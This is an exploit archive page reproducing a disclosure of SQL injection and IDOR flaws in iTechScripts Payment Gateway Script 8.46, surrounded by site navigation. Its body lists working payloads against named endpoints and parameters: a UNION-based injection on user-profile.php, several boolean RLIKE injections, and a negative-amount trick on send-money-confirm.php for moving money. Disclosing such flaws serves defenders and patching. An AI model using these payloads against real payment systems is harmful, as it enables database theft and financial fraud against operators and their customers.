iTechScripts Payment Gateway Script 8.46 SQL Injection

iTechScripts Payment Gateway Script 8.46 SQL Injection: Posted Jan 18, 2017; Authored by Hasan Emre Ozer; iTechScripts Payment Gateway Script version 8.46 suffers from multiple remote SQL injection vulnerabilities.; tags | exploit, remote, vulnerability, sql injection; SHA-256 | 823d7beb69eabd38cf5eb4a921317bf50edd69150bbb0db67ff3ac9e8222b9ba; Download | Favorite | View

iTechScripts Payment Gateway Script 8.46 SQL Injection

Exploit Title : Payment Gateway Script v8.46 - Multiple Vulnerability
Author : Hasan Emre Ozer
Google Dork :    -
Date : 18/01/2017
Type : webapps
Platform: PHP
Vendor Homepage : http://itechscripts.com/payment-gateway-script/
<http://itechscripts.com/image-sharing-script/>
Sofware Price and Demo : $400
http://payment-gateway.itechscripts.com
<http://photo-sharing.itechscripts.com/>

------------------------------------------------------

Type: Error Based Sql Injection
Vulnerable URL:http://localhost/[PATH]/user-profile.php
Vulnerable Parameters: token
Method: GET
Payload: -3519' UNION ALL SELECT
NULL,NULL,CONCAT(0x7170767871,0x6850685261566a4d586d544e68636d7458684a7943657a70704f697a6767734c4c50654b495a5770,0x716a7a7071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
------------------------------------------------------
Type: IDOR
Vulnerable URL: http://localhost/[PATH]/send-money-confirm.php
Vulnerable Parameters: t_amount and t_paid
Method: POST
Payload: negative money value (ps:-1350)
------------------------------------------------------

Type: Boolean Based Sql Injection
Vulnerable URL:http://localhost/[PATH]/netbank_historyDetails.php
Vulnerable Parameters: token
Method: GET
Payload: ' RLIKE (SELECT (CASE WHEN (6762=6762) THEN
0x343034306334636134323338613062393233383230646363353039613666373538343962
ELSE 0x28 END))-- BxvH
------------------------------------------------------

Type: Boolean Based Sql Injection
Vulnerable URL:http://localhost/[PATH]/netbank_histPrew.php
Vulnerable Parameters: token
Method: GET
Payload: ' RLIKE (SELECT (CASE WHEN (6762=6762) THEN
0x343034306334636134323338613062393233383230646363353039613666373538343962
ELSE 0x28 END))-- BxvH
------------------------------------------------------
Type: Boolean Based Sql Injection
Vulnerable URL:http://localhost/[PATH]/overview.php
Vulnerable Parameters: limit
Method: GET
Payload: ' RLIKE (SELECT (CASE WHEN (6762=6762) THEN
0x343034306334636134323338613062393233383230646363353039613666373538343962
ELSE 0x28 END))-- BxvH


-- 
Best Regards,
Hasan Emre

Top Authors In Last 30 Days

Red Hat 221 files
Ubuntu 59 files
Debian 30 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 9 files
Apple 6 files
Milad Karimi 5 files
Google Security Research 5 files
tmrswrr 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,022)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,298)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,550)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,453)
UNIX (9,394)
UnixWare (187)
Windows (6,650)
Other

iTechScripts Payment Gateway Script 8.46 SQL Injection

iTechScripts Payment Gateway Script 8.46 SQL Injection

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

iTechScripts Payment Gateway Script 8.46 SQL Injection

Share This

iTechScripts Payment Gateway Script 8.46 SQL Injection

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems